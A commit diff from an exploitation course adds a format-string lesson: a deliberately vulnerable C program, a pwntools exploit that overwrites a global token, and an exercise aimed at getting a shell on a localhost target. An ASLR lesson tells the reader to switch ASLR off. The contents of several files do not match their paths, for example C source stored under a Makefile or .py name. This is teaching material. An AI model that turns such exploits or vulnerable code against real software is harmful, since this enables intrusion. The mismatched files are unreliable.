Finished!

Author: nnamon

lessons/10_bypass_got/lessonplan.md

@@ -385,7 +385,8 @@ It was compiled with a stack canary.
 
 `gcc -m32 -znoexecstack -o ./build/2_event1 ./src/2_event1.c`
 
-The binary can be [found here][1] and the source can be [found here][2].
+The binary can be [found here][1] and the source can be [found here][2]. The
+remote target is `nc localhost 1902`.
 
 [1]: ./build/2_event1
 [2]: ./src/2_event1.c

lessons/13_fmt_str/Makefile

@@ -1,4 +1,7 @@
-all: 3_echo
+all: 2_overwrite 3_echo
+
+2_overwrite:
+	gcc -m32 -o ./build/2_overwrite ./src/2_overwrite.c
 
 3_echo:
 	gcc -m32 -znoexecstack -o ./build/3_echo ./src/3_echo.c

lessons/13_fmt_str/build/1_lottery

@@ -1 +1,116 @@
 # Format String Vulnerabilties
+
+Yes, I know this is a really cliche topic but I am just covering one cool thing
+that you can do with pwntools. That's all, I promise. Now, we will be looking at
+this simple program that is vulnerable to a format string attack. The idea is to
+modify the token so that it contains 0xcafebabe when the check occurs.
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+
+unsigned int token = 0xdeadbeef;
+
+int main() {
+    char buffer[200];
+    scanf("%199s", buffer);
+    printf(buffer);
+    printf("\nToken = 0x%x\n", token);
+    if (token == 0xcafebabe) {
+        puts("Winner!");
+    }
+    else {
+        puts("Loser!");
+    }
+}
+```
+
+So after playing around with the program, we figure out that the first format
+argument we control is at offset 5.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ ../build/2_overwrite
+AAAA%5$x
+AAAA41414141
+Token = 0xdeadbeef
+Loser!
+```
+
+Next, we need the address of the token.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ nm ../build/2_overwrite | grep token
+0804a028 D token
+```
+
+Now we can write our exploit script. Pwntools actually has a format string
+attack generator so we can beat the binary in a few quick easy lines.
+
+```python
+#!/usr/bin/python
+
+from pwn import *
+
+token_addr = 0x0804a028
+
+def main():
+    p = process("../build/2_overwrite")
+    payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
+    log.info("Sending payload: %s" % payload)
+    p.sendline(payload)
+
+    data = p.recvall()
+    realdata = data[data.find("Token"):]
+    log.success(realdata)
+
+if __name__ == "__main__":
+    main()
+```
+
+Running the program.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ python 1_overwrite_token.py
+[+] Starting local process '../build/2_overwrite': Done
+[*] Sending payload: (�)�*�+�%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn
+[▁] Receiving all data: 0B
+[+] Receiving all data: Done (742B)
+[+] Token = 0xcafebabe
+    Winner!
+```
+
+## Exercises
+
+### Ex 13.1: Echoes
+
+Before you continue onto the more advanced exercises, here's something to
+tackle. The source code to this challenge is given:
+
+```c
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+
+int main() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    char echoed[1000] = {0};
+    char number[200];
+    int times;
+    int i;
+    while (1) {
+        read(0, echoed, 999);
+        puts("How many times do you want it echoed?");
+        scanf("%199s", number);
+        times = atoi(number);
+        for (i = 0; i < times; i++) {
+            printf(echoed);
+        }
+    }
+}
+```
+
+The binary to the exercise can be found [here][1]. The remote target is `nc
+localhost 1903` and the goal is to get a shell.
+
+[1]: ./build/3_echo

lessons/13_fmt_str/build/2_overwrite

@@ -0,0 +1,18 @@
+#!/usr/bin/python
+
+from pwn import *
+
+token_addr = 0x0804a028
+
+def main():
+    p = process("../build/2_overwrite")
+    payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
+    log.info("Sending payload: %s" % payload)
+    p.sendline(payload)
+
+    data = p.recvall()
+    realdata = data[data.find("Token"):]
+    log.success(realdata)
+
+if __name__ == "__main__":
+    main()

lessons/13_fmt_str/lessonplan.md

@@ -0,0 +1,7 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+
+int main() {
+
+}

lessons/13_fmt_str/scripts/1_overwrite_token.py

@@ -0,0 +1,17 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+unsigned int token = 0xdeadbeef;
+
+int main() {
+    char buffer[200];
+    scanf("%199s", buffer);
+    printf(buffer);
+    printf("\nToken = 0x%x\n", token);
+    if (token == 0xcafebabe) {
+        puts("Winner!");
+    }
+    else {
+        puts("Loser!");
+    }
+}

lessons/13_fmt_str/src/1_lottery.c

@@ -0,0 +1,7 @@
+all: 1_reveal_addresses
+
+1_reveal_addresses:
+	gcc -m32 -o ./build/1_reveal_addresses ./src/1_reveal_addresses.c -ldl
+	gcc -o ./build/2_reveal_addresses64 ./src/1_reveal_addresses.c -ldl
+	gcc -m32 -o ./build/3_reveal_addresses_pie ./src/1_reveal_addresses.c -ldl -pie
+	gcc -o ./build/4_reveal_addresses64_pie ./src/1_reveal_addresses.c -ldl -pie -fPIC

lessons/13_fmt_str/src/2_overwrite.c

@@ -0,0 +1,178 @@
+# ASLR in Depth
+
+Actually, the title is a lie. We're not really going to discuss ASLR in that
+depth yet. We don't really need to. However, what we are going to do is explore
+the effects of ASLR on a diagnostic binary we used in the previous section.
+
+```c
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <stdio.h>
+#include <dlfcn.h>
+#include <unistd.h>
+
+
+int main() {
+    puts("This program helps visualise where libc is loaded.\n");
+    int pid = getpid();
+    char command[500];
+    puts("Memory Layout: ");
+    sprintf(command, "cat /proc/%d/maps", pid);
+    system(command);
+    puts("\nFunction Addresses: ");
+    printf("System@libc 0x%lx\n", dlsym(RTLD_NEXT, "system"));
+    printf("PID: %d\n", pid);
+}
+```
+
+## ASLR Turned Off
+
+First, make sure ASLR is turned off.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/8_aslr/build$ echo 0 | sudo tee
+/proc/sys/kernel/randomize_va_space
+0
+```
+
+Now, play with the binaries in `/vagrant/lessons/8_aslr/build/`. You should
+notice that the addresses the objects are mapped at are more or less constant.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/8_aslr/build$ ./1_reveal_addresses
+This program helps visualise where libc is loaded.
+
+Memory Layout:
+08048000-08049000 r-xp 00000000 00:28 161
+/vagrant/lessons/8_aslr/build/1_reveal_addresses
+08049000-0804a000 r--p 00000000 00:28 161
+/vagrant/lessons/8_aslr/build/1_reveal_addresses
+0804a000-0804b000 rw-p 00001000 00:28 161
+/vagrant/lessons/8_aslr/build/1_reveal_addresses
+0804b000-0806c000 rw-p 00000000 00:00 0                                  [heap]
+f7e0f000-f7e10000 rw-p 00000000 00:00 0
+f7e10000-f7fbf000 r-xp 00000000 08:01 256310
+/lib/i386-linux-gnu/libc-2.23.so
+f7fbf000-f7fc0000 ---p 001af000 08:01 256310
+/lib/i386-linux-gnu/libc-2.23.so
+f7fc0000-f7fc2000 r--p 001af000 08:01 256310
+/lib/i386-linux-gnu/libc-2.23.so
+f7fc2000-f7fc3000 rw-p 001b1000 08:01 256310
+/lib/i386-linux-gnu/libc-2.23.so
+f7fc3000-f7fc6000 rw-p 00000000 00:00 0
+f7fc6000-f7fc9000 r-xp 00000000 08:01 256309
+/lib/i386-linux-gnu/libdl-2.23.so
+f7fc9000-f7fca000 r--p 00002000 08:01 256309
+/lib/i386-linux-gnu/libdl-2.23.so
+f7fca000-f7fcb000 rw-p 00003000 08:01 256309
+/lib/i386-linux-gnu/libdl-2.23.so
+f7fd4000-f7fd6000 rw-p 00000000 00:00 0
+f7fd6000-f7fd8000 r--p 00000000 00:00 0                                  [vvar]
+f7fd8000-f7fd9000 r-xp 00000000 00:00 0                                  [vdso]
+f7fd9000-f7ffb000 r-xp 00000000 08:01 256300
+/lib/i386-linux-gnu/ld-2.23.so
+f7ffb000-f7ffc000 rw-p 00000000 00:00 0
+f7ffc000-f7ffd000 r--p 00022000 08:01 256300
+/lib/i386-linux-gnu/ld-2.23.so
+f7ffd000-f7ffe000 rw-p 00023000 08:01 256300
+/lib/i386-linux-gnu/ld-2.23.so
+fffdd000-ffffe000 rw-p 00000000 00:00 0                                  [stack]
+
+Function Addresses:
+System@libc 0xf7e4ada0
+PID: 4452
+```
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/8_aslr/build$ ./4_reveal_addresses64_pie
+This program helps visualise where libc is loaded.
+
+Memory Layout:
+555555554000-555555555000 r-xp 00000000 00:28 158
+/vagrant/lessons/8_aslr/build/4_reveal_addresses64_pie
+555555754000-555555755000 r--p 00000000 00:28 158
+/vagrant/lessons/8_aslr/build/4_reveal_addresses64_pie
+555555755000-555555756000 rw-p 00001000 00:28 158
+/vagrant/lessons/8_aslr/build/4_reveal_addresses64_pie
+555555756000-555555777000 rw-p 00000000 00:00 0                          [heap]
+7ffff780a000-7ffff79c9000 r-xp 00000000 08:01 2068
+/lib/x86_64-linux-gnu/libc-2.23.so
+7ffff79c9000-7ffff7bc9000 ---p 001bf000 08:01 2068
+/lib/x86_64-linux-gnu/libc-2.23.so
+7ffff7bc9000-7ffff7bcd000 r--p 001bf000 08:01 2068
+/lib/x86_64-linux-gnu/libc-2.23.so
+7ffff7bcd000-7ffff7bcf000 rw-p 001c3000 08:01 2068
+/lib/x86_64-linux-gnu/libc-2.23.so
+7ffff7bcf000-7ffff7bd3000 rw-p 00000000 00:00 0
+7ffff7bd3000-7ffff7bd6000 r-xp 00000000 08:01 2067
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7ffff7bd6000-7ffff7dd5000 ---p 00003000 08:01 2067
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7ffff7dd5000-7ffff7dd6000 r--p 00002000 08:01 2067
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7ffff7dd6000-7ffff7dd7000 rw-p 00003000 08:01 2067
+/lib/x86_64-linux-gnu/libdl-2.23.so
+7ffff7dd7000-7ffff7dfd000 r-xp 00000000 08:01 2051
+/lib/x86_64-linux-gnu/ld-2.23.so
+7ffff7fea000-7ffff7fed000 rw-p 00000000 00:00 0
+7ffff7ff6000-7ffff7ff8000 rw-p 00000000 00:00 0
+7ffff7ff8000-7ffff7ffa000 r--p 00000000 00:00 0                          [vvar]
+7ffff7ffa000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
+7ffff7ffc000-7ffff7ffd000 r--p 00025000 08:01 2051
+/lib/x86_64-linux-gnu/ld-2.23.so
+7ffff7ffd000-7ffff7ffe000 rw-p 00026000 08:01 2051
+/lib/x86_64-linux-gnu/ld-2.23.so
+7ffff7ffe000-7ffff7fff000 rw-p 00000000 00:00 0
+7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
+ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0
+[vsyscall]
+
+Function Addresses:
+System@libc 0x7ffff784f390
+PID: 4446
+```
+
+## ASLR Turned On
+
+Now, turn on the ASLR.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/8_aslr/build$ echo 2 | sudo tee
+/proc/sys/kernel/randomize_va_space
+2
+```
+
+Before repeating the previous steps on the binaries again, take a look at the
+output from `checksec`.
+
+```shell
+ubuntu@ubuntu-xenial:/vagrant/lessons/8_aslr/build$ checksec *
+[*] '/vagrant/lessons/8_aslr/build/1_reveal_addresses'
+    Arch:     i386-32-little
+    RELRO:    Partial RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      No PIE
+[*] '/vagrant/lessons/8_aslr/build/2_reveal_addresses64'
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      No PIE
+[*] '/vagrant/lessons/8_aslr/build/3_reveal_addresses_pie'
+    Arch:     i386-32-little
+    RELRO:    Partial RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      PIE enabled
+[*] '/vagrant/lessons/8_aslr/build/4_reveal_addresses64_pie'
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    Canary found
+    NX:       NX enabled
+    PIE:      PIE enabled
+```
+
+Notice that the last two have PIE enabled. PIE stands for Position Independent
+Executable. Do you notice any interesting about the results when running these
+binaries with ASLR turned on?

lessons/8_aslr/Makefile

@@ -0,0 +1,18 @@
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <stdio.h>
+#include <dlfcn.h>
+#include <unistd.h>
+
+
+int main() {
+    puts("This program helps visualise where libc is loaded.\n");
+    int pid = getpid();
+    char command[500];
+    puts("Memory Layout: ");
+    sprintf(command, "cat /proc/%d/maps", pid);
+    system(command);
+    puts("\nFunction Addresses: ");
+    printf("System@libc 0x%lx\n", dlsym(RTLD_NEXT, "system"));
+    printf("PID: %d\n", pid);
+}

lessons/8_aslr/build/1_reveal_addresses

@@ -426,7 +426,8 @@ int main() {
 }
 ```
 
-The binary can be found [here][5].
+The binary can be found [here][5]. And the remote target is at `nc localhost
+1901`.
 
 If you get stuck, you can look at the following solution scripts in order of
 completeness.